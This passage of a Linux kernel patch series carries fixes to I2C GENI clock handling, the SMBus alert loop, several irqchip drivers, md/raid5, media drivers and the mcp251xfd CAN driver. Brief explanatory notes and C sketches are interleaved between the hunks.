++		clk_disable_unprepare(gi2c->core_clk);
+ 		return ret;
+ 	}
+ 	proto = geni_se_read_proto(&gi2c->se);
+ 	if (proto != GENI_SE_I2C) {
+ 		dev_err(dev, "Invalid proto %d\n", proto);
+ 		geni_se_resources_off(&gi2c->se);
++		clk_disable_unprepare(gi2c->core_clk);
+ 		return -ENXIO;
+ 	}
+ 
+-	fifo_disable = readl_relaxed(gi2c->se.base + GENI_IF_DISABLE_RO) & FIFO_IF_DISABLE;
++	if (desc && desc->no_dma_support)
++		fifo_disable = false;
++	else
++		fifo_disable = readl_relaxed(gi2c->se.base + GENI_IF_DISABLE_RO) & FIFO_IF_DISABLE;
++
+ 	if (fifo_disable) {
+ 		/* FIFO is disabled, so we can only use GPI DMA */
+ 		gi2c->gpi_mode = true;
+ 		ret = setup_gpi_dma(gi2c);
+-		if (ret)
++		if (ret) {
++			geni_se_resources_off(&gi2c->se);
++			clk_disable_unprepare(gi2c->core_clk);
+ 			return dev_err_probe(dev, ret, "Failed to setup GPI DMA mode\n");
++		}
+ 
+ 		dev_dbg(dev, "Using GPI DMA mode for I2C\n");
+ 	} else {
+ 		gi2c->gpi_mode = false;
+ 		tx_depth = geni_se_get_tx_fifo_depth(&gi2c->se);
++
++		/* I2C Master Hub Serial Elements doesn't have the HW_PARAM_0 register */
++		if (!tx_depth && desc)
++			tx_depth = desc->tx_fifo_depth;
++
++		if (!tx_depth) {
++			dev_err(dev, "Invalid TX FIFO depth\n");
++			geni_se_resources_off(&gi2c->se);
++			clk_disable_unprepare(gi2c->core_clk);
++			return -EINVAL;
++		}
++
+ 		gi2c->tx_wm = tx_depth - 1;
+ 		geni_se_init(&gi2c->se, gi2c->tx_wm, tx_depth);
+ 		geni_se_config_packing(&gi2c->se, BITS_PER_BYTE,
+@@ -866,6 +909,7 @@ static int geni_i2c_probe(struct platform_device *pdev)
+ 		dev_dbg(dev, "i2c fifo/se-dma mode. fifo depth:%d\n", tx_depth);
+ 	}
+ 
++	clk_disable_unprepare(gi2c->core_clk);
+ 	ret = geni_se_resources_off(&gi2c->se);
+ 	if (ret) {
+ 		dev_err(dev, "Error turning off resources %d\n", ret);
+@@ -931,6 +975,8 @@ static int __maybe_unused geni_i2c_runtime_suspend(struct device *dev)
+ 		gi2c->suspended = 1;
+ 	}
+ 
++	clk_disable_unprepare(gi2c->core_clk);
++
+ 	return geni_icc_disable(&gi2c->se);
+ }
+ 
+@@ -943,10 +989,17 @@ static int __maybe_unused geni_i2c_runtime_resume(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = geni_se_resources_on(&gi2c->se);
++	ret = clk_prepare_enable(gi2c->core_clk);
+ 	if (ret)
+ 		return ret;
+ 
++	ret = geni_se_resources_on(&gi2c->se);
++	if (ret) {
++		clk_disable_unprepare(gi2c->core_clk);
++		geni_icc_disable(&gi2c->se);
++		return ret;
++	}
++
+ 	enable_irq(gi2c->irq);
+ 	gi2c->suspended = 0;
+ 	return 0;
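
The runtime-resume hunk enables resources in the order ICC, core clock, SE resources, and each failure branch has to release whatever was already acquired, in reverse. The same ordering written as the conventional goto ladder; this is only a sketch using the driver's helper names (geni_icc_enable() is the call just above the visible context), while the patch keeps its unwinding inline:

static int geni_i2c_resume_sketch(struct geni_i2c_dev *gi2c)
{
	int ret;

	ret = geni_icc_enable(&gi2c->se);
	if (ret)
		return ret;

	ret = clk_prepare_enable(gi2c->core_clk);	/* NULL clk is a no-op */
	if (ret)
		goto err_icc;

	ret = geni_se_resources_on(&gi2c->se);
	if (ret)
		goto err_clk;

	return 0;

err_clk:
	clk_disable_unprepare(gi2c->core_clk);
err_icc:
	geni_icc_disable(&gi2c->se);
	return ret;
}
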
+diff --git a/drivers/i2c/i2c-smbus.c b/drivers/i2c/i2c-smbus.c
+index 07c92c8495a3c..8d0b520eb8e8d 100644
+--- a/drivers/i2c/i2c-smbus.c
++++ b/drivers/i2c/i2c-smbus.c
+@@ -34,6 +34,7 @@ static int smbus_do_alert(struct device *dev, void *addrp)
+ 	struct i2c_client *client = i2c_verify_client(dev);
+ 	struct alert_data *data = addrp;
+ 	struct i2c_driver *driver;
++	int ret;
+ 
+ 	if (!client || client->addr != data->addr)
+ 		return 0;
+@@ -47,16 +48,47 @@ static int smbus_do_alert(struct device *dev, void *addrp)
+ 	device_lock(dev);
+ 	if (client->dev.driver) {
+ 		driver = to_i2c_driver(client->dev.driver);
+-		if (driver->alert)
++		if (driver->alert) {
++			/* Stop iterating after we find the device */
+ 			driver->alert(client, data->type, data->data);
+-		else
++			ret = -EBUSY;
++		} else {
+ 			dev_warn(&client->dev, "no driver alert()!\n");
+-	} else
++			ret = -EOPNOTSUPP;
++		}
++	} else {
+ 		dev_dbg(&client->dev, "alert with no driver\n");
++		ret = -ENODEV;
++	}
++	device_unlock(dev);
++
++	return ret;
++}
++
++/* Same as above, but call back all drivers with alert handler */
++
++static int smbus_do_alert_force(struct device *dev, void *addrp)
++{
++	struct i2c_client *client = i2c_verify_client(dev);
++	struct alert_data *data = addrp;
++	struct i2c_driver *driver;
++
++	if (!client || (client->flags & I2C_CLIENT_TEN))
++		return 0;
++
++	/*
++	 * Drivers should either disable alerts, or provide at least
++	 * a minimal handler. Lock so the driver won't change.
++	 */
++	device_lock(dev);
++	if (client->dev.driver) {
++		driver = to_i2c_driver(client->dev.driver);
++		if (driver->alert)
++			driver->alert(client, data->type, data->data);
++	}
+ 	device_unlock(dev);
+ 
+-	/* Stop iterating after we find the device */
+-	return -EBUSY;
++	return 0;
+ }
+ 
+ /*
+@@ -67,6 +99,7 @@ static irqreturn_t smbus_alert(int irq, void *d)
+ {
+ 	struct i2c_smbus_alert *alert = d;
+ 	struct i2c_client *ara;
++	unsigned short prev_addr = I2C_CLIENT_END; /* Not a valid address */
+ 
+ 	ara = alert->ara;
+ 
+@@ -94,8 +127,25 @@ static irqreturn_t smbus_alert(int irq, void *d)
+ 			data.addr, data.data);
+ 
+ 		/* Notify driver for the device which issued the alert */
+-		device_for_each_child(&ara->adapter->dev, &data,
+-				      smbus_do_alert);
++		status = device_for_each_child(&ara->adapter->dev, &data,
++					       smbus_do_alert);
++		/*
++		 * If we read the same address more than once, and the alert
++		 * was not handled by a driver, it won't do any good to repeat
++		 * the loop because it will never terminate. Try again, this
++		 * time calling the alert handlers of all devices connected to
++		 * the bus, and abort the loop afterwards. If this helps, we
++		 * are all set. If it doesn't, there is nothing else we can do,
++		 * so we might as well abort the loop.
++		 * Note: This assumes that a driver with alert handler handles
++		 * the alert properly and clears it if necessary.
++		 */
++		if (data.addr == prev_addr && status != -EBUSY) {
++			device_for_each_child(&ara->adapter->dev, &data,
++					      smbus_do_alert_force);
++			break;
++		}
++		prev_addr = data.addr;
+ 	}
+ 
+ 	return IRQ_HANDLED;
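
The retry logic above hinges on the status codes that smbus_do_alert() now returns through device_for_each_child(), which stops iterating at the first non-zero return value. A small self-contained sketch of how the caller interprets them; the helper below is illustrative, not part of the patch:

#include <linux/errno.h>
#include <linux/types.h>

/* Outcome of one pass of device_for_each_child(..., smbus_do_alert):
 *   -EBUSY      a bound driver's alert() handler ran (and is expected
 *               to have cleared the alert)
 *   -EOPNOTSUPP a driver is bound but has no alert() handler
 *   -ENODEV     a device matched the address but has no driver bound
 *   0           no child matched the address at all
 */
static bool alert_is_stuck(int status, unsigned short addr,
			   unsigned short prev_addr)
{
	/* Same address reported twice with nobody clearing it: time
	 * for the broadcast fallback pass, after which the loop aborts
	 * so it cannot spin forever.
	 */
	return addr == prev_addr && status != -EBUSY;
}
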
+diff --git a/drivers/irqchip/irq-loongarch-cpu.c b/drivers/irqchip/irq-loongarch-cpu.c
+index fdec3e9cfacfb..9c6f774e49351 100644
+--- a/drivers/irqchip/irq-loongarch-cpu.c
++++ b/drivers/irqchip/irq-loongarch-cpu.c
+@@ -18,11 +18,13 @@ struct fwnode_handle *cpuintc_handle;
+ 
+ static u32 lpic_gsi_to_irq(u32 gsi)
+ {
++	int irq = 0;
++
+ 	/* Only pch irqdomain transferring is required for LoongArch. */
+ 	if (gsi >= GSI_MIN_PCH_IRQ && gsi <= GSI_MAX_PCH_IRQ)
+-		return acpi_register_gsi(NULL, gsi, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_HIGH);
++		irq = acpi_register_gsi(NULL, gsi, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_HIGH);
+ 
+-	return 0;
++	return (irq > 0) ? irq : 0;
+ }
+ 
+ static struct fwnode_handle *lpic_get_gsi_domain_id(u32 gsi)
+diff --git a/drivers/irqchip/irq-mbigen.c b/drivers/irqchip/irq-mbigen.c
+index f3faf5c997706..23117a30c6275 100644
+--- a/drivers/irqchip/irq-mbigen.c
++++ b/drivers/irqchip/irq-mbigen.c
+@@ -64,6 +64,20 @@ struct mbigen_device {
+ 	void __iomem		*base;
+ };
+ 
++static inline unsigned int get_mbigen_node_offset(unsigned int nid)
++{
++	unsigned int offset = nid * MBIGEN_NODE_OFFSET;
++
++	/*
++	 * To avoid touching the clear register in an unexpected way, directly
++	 * skip over it when accessing more than 10 mbigen nodes.
++	 */
++	if (nid >= (REG_MBIGEN_CLEAR_OFFSET / MBIGEN_NODE_OFFSET))
++		offset += MBIGEN_NODE_OFFSET;
++
++	return offset;
++}
++
+ static inline unsigned int get_mbigen_vec_reg(irq_hw_number_t hwirq)
+ {
+ 	unsigned int nid, pin;
+@@ -72,8 +86,7 @@ static inline unsigned int get_mbigen_vec_reg(irq_hw_number_t hwirq)
+ 	nid = hwirq / IRQS_PER_MBIGEN_NODE + 1;
+ 	pin = hwirq % IRQS_PER_MBIGEN_NODE;
+ 
+-	return pin * 4 + nid * MBIGEN_NODE_OFFSET
+-			+ REG_MBIGEN_VEC_OFFSET;
++	return pin * 4 + get_mbigen_node_offset(nid) + REG_MBIGEN_VEC_OFFSET;
+ }
+ 
+ static inline void get_mbigen_type_reg(irq_hw_number_t hwirq,
+@@ -88,8 +101,7 @@ static inline void get_mbigen_type_reg(irq_hw_number_t hwirq,
+ 	*mask = 1 << (irq_ofst % 32);
+ 	ofst = irq_ofst / 32 * 4;
+ 
+-	*addr = ofst + nid * MBIGEN_NODE_OFFSET
+-		+ REG_MBIGEN_TYPE_OFFSET;
++	*addr = ofst + get_mbigen_node_offset(nid) + REG_MBIGEN_TYPE_OFFSET;
+ }
+ 
+ static inline void get_mbigen_clear_reg(irq_hw_number_t hwirq,
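
With the driver's constants (MBIGEN_NODE_OFFSET = 0x1000 and REG_MBIGEN_CLEAR_OFFSET = 0xa000; values assumed from drivers/irqchip/irq-mbigen.c, they are not visible in this hunk), get_mbigen_node_offset() leaves nodes 0-9 in place and pushes everything from node 10 up by one node stride, so the vector/type registers never overlap the clear-register window:

/* node_offset(9)  == 0x9000                     (last node below the window)
 * node_offset(10) == 0xa000 + 0x1000 == 0xb000  (skips the window at 0xa000)
 * node_offset(11) == 0xb000 + 0x1000 == 0xc000
 */
static unsigned int node_offset(unsigned int nid)
{
	unsigned int offset = nid * 0x1000;

	if (nid >= 0xa000 / 0x1000)	/* i.e. nid >= 10 */
		offset += 0x1000;
	return offset;
}
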
+diff --git a/drivers/irqchip/irq-meson-gpio.c b/drivers/irqchip/irq-meson-gpio.c
+index 7da18ef952119..37e4aa091ac82 100644
+--- a/drivers/irqchip/irq-meson-gpio.c
++++ b/drivers/irqchip/irq-meson-gpio.c
+@@ -168,7 +168,7 @@ struct meson_gpio_irq_controller {
+ 	void __iomem *base;
+ 	u32 channel_irqs[MAX_NUM_CHANNEL];
+ 	DECLARE_BITMAP(channel_map, MAX_NUM_CHANNEL);
+-	spinlock_t lock;
++	raw_spinlock_t lock;
+ };
+ 
+ static void meson_gpio_irq_update_bits(struct meson_gpio_irq_controller *ctl,
+@@ -177,14 +177,14 @@ static void meson_gpio_irq_update_bits(struct meson_gpio_irq_controller *ctl,
+ 	unsigned long flags;
+ 	u32 tmp;
+ 
+-	spin_lock_irqsave(&ctl->lock, flags);
++	raw_spin_lock_irqsave(&ctl->lock, flags);
+ 
+ 	tmp = readl_relaxed(ctl->base + reg);
+ 	tmp &= ~mask;
+ 	tmp |= val;
+ 	writel_relaxed(tmp, ctl->base + reg);
+ 
+-	spin_unlock_irqrestore(&ctl->lock, flags);
++	raw_spin_unlock_irqrestore(&ctl->lock, flags);
+ }
+ 
+ static void meson_gpio_irq_init_dummy(struct meson_gpio_irq_controller *ctl)
+@@ -234,12 +234,12 @@ meson_gpio_irq_request_channel(struct meson_gpio_irq_controller *ctl,
+ 	unsigned long flags;
+ 	unsigned int idx;
+ 
+-	spin_lock_irqsave(&ctl->lock, flags);
++	raw_spin_lock_irqsave(&ctl->lock, flags);
+ 
+ 	/* Find a free channel */
+ 	idx = find_first_zero_bit(ctl->channel_map, ctl->params->nr_channels);
+ 	if (idx >= ctl->params->nr_channels) {
+-		spin_unlock_irqrestore(&ctl->lock, flags);
++		raw_spin_unlock_irqrestore(&ctl->lock, flags);
+ 		pr_err("No channel available\n");
+ 		return -ENOSPC;
+ 	}
+@@ -247,7 +247,7 @@ meson_gpio_irq_request_channel(struct meson_gpio_irq_controller *ctl,
+ 	/* Mark the channel as used */
+ 	set_bit(idx, ctl->channel_map);
+ 
+-	spin_unlock_irqrestore(&ctl->lock, flags);
++	raw_spin_unlock_irqrestore(&ctl->lock, flags);
+ 
+ 	/*
+ 	 * Setup the mux of the channel to route the signal of the pad
+@@ -557,7 +557,7 @@ static int meson_gpio_irq_of_init(struct device_node *node, struct device_node *
+ 	if (!ctl)
+ 		return -ENOMEM;
+ 
+-	spin_lock_init(&ctl->lock);
++	raw_spin_lock_init(&ctl->lock);
+ 
+ 	ctl->base = of_iomap(node, 0);
+ 	if (!ctl->base) {
+diff --git a/drivers/irqchip/irq-xilinx-intc.c b/drivers/irqchip/irq-xilinx-intc.c
+index 238d3d3449496..7e08714d507f4 100644
+--- a/drivers/irqchip/irq-xilinx-intc.c
++++ b/drivers/irqchip/irq-xilinx-intc.c
+@@ -189,7 +189,7 @@ static int __init xilinx_intc_of_init(struct device_node *intc,
+ 		irqc->intr_mask = 0;
+ 	}
+ 
+-	if (irqc->intr_mask >> irqc->nr_irq)
++	if ((u64)irqc->intr_mask >> irqc->nr_irq)
+ 		pr_warn("irq-xilinx: mismatch in kind-of-intr param\n");
+ 
+ 	pr_info("irq-xilinx: %pOF: num_irq=%d, edge=0x%x\n",
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 7dc1c42accccd..b87c6ef0da8ab 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -489,7 +489,6 @@ void mddev_suspend(struct mddev *mddev)
+ 	clear_bit_unlock(MD_ALLOW_SB_UPDATE, &mddev->flags);
+ 	wait_event(mddev->sb_wait, !test_bit(MD_UPDATING_SB, &mddev->flags));
+ 
+-	del_timer_sync(&mddev->safemode_timer);
+ 	/* restrict memory reclaim I/O during raid array is suspend */
+ 	mddev->noio_flag = memalloc_noio_save();
+ }
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index ed99b449d8fd4..4315dabd32023 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -6316,7 +6316,9 @@ static sector_t reshape_request(struct mddev *mddev, sector_t sector_nr, int *sk
+ 	safepos = conf->reshape_safe;
+ 	sector_div(safepos, data_disks);
+ 	if (mddev->reshape_backwards) {
+-		BUG_ON(writepos < reshape_sectors);
++		if (WARN_ON(writepos < reshape_sectors))
++			return MaxSector;
++
+ 		writepos -= reshape_sectors;
+ 		readpos += reshape_sectors;
+ 		safepos += reshape_sectors;
+@@ -6334,14 +6336,18 @@ static sector_t reshape_request(struct mddev *mddev, sector_t sector_nr, int *sk
+ 	 * to set 'stripe_addr' which is where we will write to.
+ 	 */
+ 	if (mddev->reshape_backwards) {
+-		BUG_ON(conf->reshape_progress == 0);
++		if (WARN_ON(conf->reshape_progress == 0))
++			return MaxSector;
++
+ 		stripe_addr = writepos;
+-		BUG_ON((mddev->dev_sectors &
+-			~((sector_t)reshape_sectors - 1))
+-		       - reshape_sectors - stripe_addr
+-		       != sector_nr);
++		if (WARN_ON((mddev->dev_sectors &
++		    ~((sector_t)reshape_sectors - 1)) -
++		    reshape_sectors - stripe_addr != sector_nr))
++			return MaxSector;
+ 	} else {
+-		BUG_ON(writepos != sector_nr + reshape_sectors);
++		if (WARN_ON(writepos != sector_nr + reshape_sectors))
++			return MaxSector;
++
+ 		stripe_addr = sector_nr;
+ 	}
+ 
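
The BUG_ON() to WARN_ON() conversions above work because WARN_ON(x) evaluates to !!(x) in addition to printing a backtrace, so a single expression both reports the inconsistency and guards the early bail-out. The shape of the converted checks:

	/* Warn and log once, then fail the reshape request gracefully
	 * instead of halting the machine.
	 */
	if (WARN_ON(writepos < reshape_sectors))
		return MaxSector;	/* caller treats this as "reshape done" */
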
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index dc35a87e628ec..2bfab4467b81c 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -145,7 +145,6 @@ static int vdec_op_s_ctrl(struct v4l2_ctrl *ctrl)
+ 	struct vdec_t *vdec = inst->priv;
+ 	int ret = 0;
+ 
+-	vpu_inst_lock(inst);
+ 	switch (ctrl->id) {
+ 	case V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY_ENABLE:
+ 		vdec->params.display_delay_enable = ctrl->val;
+@@ -157,7 +156,6 @@ static int vdec_op_s_ctrl(struct v4l2_ctrl *ctrl)
+ 		ret = -EINVAL;
+ 		break;
+ 	}
+-	vpu_inst_unlock(inst);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/media/platform/amphion/venc.c b/drivers/media/platform/amphion/venc.c
+index 1df2b35c1a240..c9cfef16c5b92 100644
+--- a/drivers/media/platform/amphion/venc.c
++++ b/drivers/media/platform/amphion/venc.c
+@@ -528,7 +528,6 @@ static int venc_op_s_ctrl(struct v4l2_ctrl *ctrl)
+ 	struct venc_t *venc = inst->priv;
+ 	int ret = 0;
+ 
+-	vpu_inst_lock(inst);
+ 	switch (ctrl->id) {
+ 	case V4L2_CID_MPEG_VIDEO_H264_PROFILE:
+ 		venc->params.profile = ctrl->val;
+@@ -589,7 +588,6 @@ static int venc_op_s_ctrl(struct v4l2_ctrl *ctrl)
+ 		ret = -EINVAL;
+ 		break;
+ 	}
+-	vpu_inst_unlock(inst);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/media/tuners/xc2028.c b/drivers/media/tuners/xc2028.c
+index 5a967edceca93..352b8a3679b72 100644
+--- a/drivers/media/tuners/xc2028.c
++++ b/drivers/media/tuners/xc2028.c
+@@ -1361,9 +1361,16 @@ static void load_firmware_cb(const struct firmware *fw,
+ 			     void *context)
+ {
+ 	struct dvb_frontend *fe = context;
+-	struct xc2028_data *priv = fe->tuner_priv;
++	struct xc2028_data *priv;
+ 	int rc;
+ 
++	if (!fe) {
++		pr_warn("xc2028: No frontend in %s\n", __func__);
++		return;
++	}
++
++	priv = fe->tuner_priv;
++
+ 	tuner_dbg("request_firmware_nowait(): %s\n", fw ? "OK" : "error");
+ 	if (!fw) {
+ 		tuner_err("Could not load firmware %s.\n", priv->fname);
+diff --git a/drivers/media/usb/uvc/uvc_video.c b/drivers/media/usb/uvc/uvc_video.c
+index a5ad3ff8bdbb9..aa0a879a9c64a 100644
+--- a/drivers/media/usb/uvc/uvc_video.c
++++ b/drivers/media/usb/uvc/uvc_video.c
+@@ -212,13 +212,13 @@ static void uvc_fixup_video_ctrl(struct uvc_streaming *stream,
+ 		 * Compute a bandwidth estimation by multiplying the frame
+ 		 * size by the number of video frames per second, divide the
+ 		 * result by the number of USB frames (or micro-frames for
+-		 * high-speed devices) per second and add the UVC header size
+-		 * (assumed to be 12 bytes long).
++		 * high- and super-speed devices) per second and add the UVC
++		 * header size (assumed to be 12 bytes long).
+ 		 */
+ 		bandwidth = frame->wWidth * frame->wHeight / 8 * format->bpp;
+ 		bandwidth *= 10000000 / interval + 1;
+ 		bandwidth /= 1000;
+-		if (stream->dev->udev->speed == USB_SPEED_HIGH)
++		if (stream->dev->udev->speed >= USB_SPEED_HIGH)
+ 			bandwidth /= 8;
+ 		bandwidth += 12;
+ 
+@@ -476,6 +476,7 @@ uvc_video_clock_decode(struct uvc_streaming *stream, struct uvc_buffer *buf,
+ 	ktime_t time;
+ 	u16 host_sof;
+ 	u16 dev_sof;
++	u32 dev_stc;
+ 
+ 	switch (data[1] & (UVC_STREAM_PTS | UVC_STREAM_SCR)) {
+ 	case UVC_STREAM_PTS | UVC_STREAM_SCR:
+@@ -522,6 +523,34 @@ uvc_video_clock_decode(struct uvc_streaming *stream, struct uvc_buffer *buf,
+ 	if (dev_sof == stream->clock.last_sof)
+ 		return;
+ 
++	dev_stc = get_unaligned_le32(&data[header_size - 6]);
++
++	/*
++	 * STC (Source Time Clock) is the clock used by the camera. The UVC 1.5
++	 * standard states that it "must be captured when the first video data
++	 * of a video frame is put on the USB bus". This is generally understood
++	 * as requiring devices to clear the payload header's SCR bit before
++	 * the first packet containing video data.
++	 *
++	 * Most vendors follow that interpretation, but some (namely SunplusIT
++	 * on some devices) always set the `UVC_STREAM_SCR` bit, fill the SCR
++	 * field with 0's, and expect that the driver only processes the SCR if
++	 * there is data in the packet.
++	 *
++	 * Ignore all the hardware timestamp information if we haven't received
++	 * any data for this frame yet, the packet contains no data, and both
++	 * STC and SOF are zero. This heuristic should be safe on
++	 * compliant devices: even in the very unlikely case where a
++	 * UVC 1.1 device sends timing information only before the first
++	 * packet containing data, and both STC and SOF happen to be
++	 * zero for a particular frame, we would only miss one clock
++	 * sample out of many and the clock recovery algorithm wouldn't
++	 * suffer from this condition.
++	 */
++	if (buf && buf->bytesused == 0 && len == header_size &&
++	    dev_stc == 0 && dev_sof == 0)
++		return;
++
+ 	stream->clock.last_sof = dev_sof;
+ 
+ 	host_sof = usb_get_current_frame_number(stream->dev->udev);
+@@ -560,7 +589,7 @@ uvc_video_clock_decode(struct uvc_streaming *stream, struct uvc_buffer *buf,
+ 	spin_lock_irqsave(&stream->clock.lock, flags);
+ 
+ 	sample = &stream->clock.samples[stream->clock.head];
+-	sample->dev_stc = get_unaligned_le32(&data[header_size - 6]);
++	sample->dev_stc = dev_stc;
+ 	sample->dev_sof = dev_sof;
+ 	sample->host_sof = host_sof;
+ 	sample->host_time = time;
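
A worked instance of the bandwidth estimate described in the comment above, using assumed numbers (640x480 YUYV, so 16 bits per pixel, at 30 fps, i.e. a dwFrameInterval of 333333 in 100 ns units) on a high-speed device:

	u32 bandwidth;

	bandwidth = 640 * 480 / 8 * 16;		/* 614400 bytes per video frame */
	bandwidth *= 10000000 / 333333 + 1;	/* x31: frames per second, rounded up */
	bandwidth /= 1000;			/* 19046 bytes per 1 ms USB frame */
	bandwidth /= 8;				/* 2380 bytes per 125 us micro-frame */
	bandwidth += 12;			/* 2392, incl. the 12-byte UVC header */

The speed-check change matters because super-speed devices also use 125 us service intervals, so the divide-by-8 step must apply to anything at or above USB_SPEED_HIGH, not to high speed alone.
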
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+index bf3f0f150199d..4d0246a0779a6 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+@@ -475,6 +475,8 @@ int mcp251xfd_ring_alloc(struct mcp251xfd_priv *priv)
+ 		clear_bit(MCP251XFD_FLAGS_FD_MODE, priv->flags);
+ 	}
+ 
++	tx_ring->obj_num_shift_to_u8 = BITS_PER_TYPE(tx_ring->obj_num) -
++		ilog2(tx_ring->obj_num);
+ 	tx_ring->obj_size = tx_obj_size;
+ 
+ 	rem = priv->rx_obj_num;
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+index 237617b0c125f..902eb767426d1 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+@@ -2,7 +2,7 @@
+ //
+ // mcp251xfd - Microchip MCP251xFD Family CAN controller driver
+ //
+-// Copyright (c) 2019, 2020, 2021 Pengutronix,
++// Copyright (c) 2019, 2020, 2021, 2023 Pengutronix,
+ //               Marc Kleine-Budde <kernel@pengutronix.de>
+ //
+ // Based on:
+@@ -16,6 +16,11 @@
+ 
+ #include "mcp251xfd.h"
+ 
++static inline bool mcp251xfd_tx_fifo_sta_full(u32 fifo_sta)
++{
++	return !(fifo_sta & MCP251XFD_REG_FIFOSTA_TFNRFNIF);
++}
++
+ static inline int
+ mcp251xfd_tef_tail_get_from_chip(const struct mcp251xfd_priv *priv,
+ 				 u8 *tef_tail)
+@@ -55,56 +60,39 @@ static int mcp251xfd_check_tef_tail(const struct mcp251xfd_priv *priv)
+ 	return 0;
+ }
+ 
+-static int
+-mcp251xfd_handle_tefif_recover(const struct mcp251xfd_priv *priv, const u32 seq)
+-{
+-	const struct mcp251xfd_tx_ring *tx_ring = priv->tx;
+-	u32 tef_sta;
+-	int err;
+-
+-	err = regmap_read(priv->map_reg, MCP251XFD_REG_TEFSTA, &tef_sta);
+-	if (err)
+-		return err;
+-
+-	if (tef_sta & MCP251XFD_REG_TEFSTA_TEFOVIF) {
+-		netdev_err(priv->ndev,
+-			   "Transmit Event FIFO buffer overflow.\n");
+-		return -ENOBUFS;
+-	}
+-
+-	netdev_info(priv->ndev,
+-		    "Transmit Event FIFO buffer %s. (seq=0x%08x, tef_tail=0x%08x, tef_head=0x%08x, tx_head=0x%08x).\n",
+-		    tef_sta & MCP251XFD_REG_TEFSTA_TEFFIF ?
+-		    "full" : tef_sta & MCP251XFD_REG_TEFSTA_TEFNEIF ?
+-		    "not empty" : "empty",
+-		    seq, priv->tef->tail, priv->tef->head, tx_ring->head);
+-
+-	/* The Sequence Number in the TEF doesn't match our tef_tail. */
+-	return -EAGAIN;
+-}
+-
+ static int
+ mcp251xfd_handle_tefif_one(struct mcp251xfd_priv *priv,
+ 			   const struct mcp251xfd_hw_tef_obj *hw_tef_obj,
+ 			   unsigned int *frame_len_ptr)
+ {
+ 	struct net_device_stats *stats = &priv->ndev->stats;
++	u32 seq, tef_tail_masked, tef_tail;
+ 	struct sk_buff *skb;
+-	u32 seq, seq_masked, tef_tail_masked, tef_tail;
+ 
+-	seq = FIELD_GET(MCP251XFD_OBJ_FLAGS_SEQ_MCP2518FD_MASK,
++	 /* Use the MCP2517FD mask on the MCP2518FD, too. We only
++	  * compare 7 bits, this is enough to detect old TEF objects.
++	  */
++	seq = FIELD_GET(MCP251XFD_OBJ_FLAGS_SEQ_MCP2517FD_MASK,
+ 			hw_tef_obj->flags);
+-
+-	/* Use the MCP2517FD mask on the MCP2518FD, too. We only
+-	 * compare 7 bits, this should be enough to detect
+-	 * net-yet-completed, i.e. old TEF objects.
+-	 */
+-	seq_masked = seq &
+-		field_mask(MCP251XFD_OBJ_FLAGS_SEQ_MCP2517FD_MASK);
+ 	tef_tail_masked = priv->tef->tail &
+ 		field_mask(MCP251XFD_OBJ_FLAGS_SEQ_MCP2517FD_MASK);
+-	if (seq_masked != tef_tail_masked)
+-		return mcp251xfd_handle_tefif_recover(priv, seq);
++
++	/* According to mcp2518fd erratum DS80000789E 6., the FIFOCI
++	 * bits of a FIFOSTA register (here: the TX FIFO tail index)
++	 * might be corrupted, in which case we might process past the
++	 * TEF FIFO's head into old CAN frames.
++	 *
++	 * Compare the sequence number of the currently processed CAN
++	 * frame with the expected sequence number. Abort with
++	 * -EBADMSG if an old CAN frame is detected.
++	 */
++	if (seq != tef_tail_masked) {
++		netdev_dbg(priv->ndev, "%s: chip=0x%02x ring=0x%02x\n", __func__,
++			   seq, tef_tail_masked);
++		stats->tx_fifo_errors++;
++
++		return -EBADMSG;
++	}
+ 
+ 	tef_tail = mcp251xfd_get_tef_tail(priv);
+ 	skb = priv->can.echo_skb[tef_tail];
+@@ -120,28 +108,44 @@ mcp251xfd_handle_tefif_one(struct mcp251xfd_priv *priv,
+ 	return 0;
+ }
+ 
+-static int mcp251xfd_tef_ring_update(struct mcp251xfd_priv *priv)
++static int
++mcp251xfd_get_tef_len(struct mcp251xfd_priv *priv, u8 *len_p)
+ {
+ 	const struct mcp251xfd_tx_ring *tx_ring = priv->tx;
+-	unsigned int new_head;
+-	u8 chip_tx_tail;
++	const u8 shift = tx_ring->obj_num_shift_to_u8;
++	u8 chip_tx_tail, tail, len;
++	u32 fifo_sta;
+ 	int err;
+ 
+-	err = mcp251xfd_tx_tail_get_from_chip(priv, &chip_tx_tail);
++	err = regmap_read(priv->map_reg, MCP251XFD_REG_FIFOSTA(priv->tx->fifo_nr),
++			  &fifo_sta);
+ 	if (err)
+ 		return err;
+ 
+-	/* chip_tx_tail, is the next TX-Object send by the HW.
+-	 * The new TEF head must be >= the old head, ...
++	if (mcp251xfd_tx_fifo_sta_full(fifo_sta)) {
++		*len_p = tx_ring->obj_num;
++		return 0;
++	}
++
++	chip_tx_tail = FIELD_GET(MCP251XFD_REG_FIFOSTA_FIFOCI_MASK, fifo_sta);
++
++	err = mcp251xfd_check_tef_tail(priv);
++	if (err)
++		return err;
++	tail = mcp251xfd_get_tef_tail(priv);
++
++	/* First shift to full u8. The subtraction works on signed
++	 * values, which keeps the difference stable across the u8
++	 * overflow. The right shift acts on len, which is a u8.
+ 	 */
+-	new_head = round_down(priv->tef->head, tx_ring->obj_num) + chip_tx_tail;
+-	if (new_head <= priv->tef->head)
+-		new_head += tx_ring->obj_num;
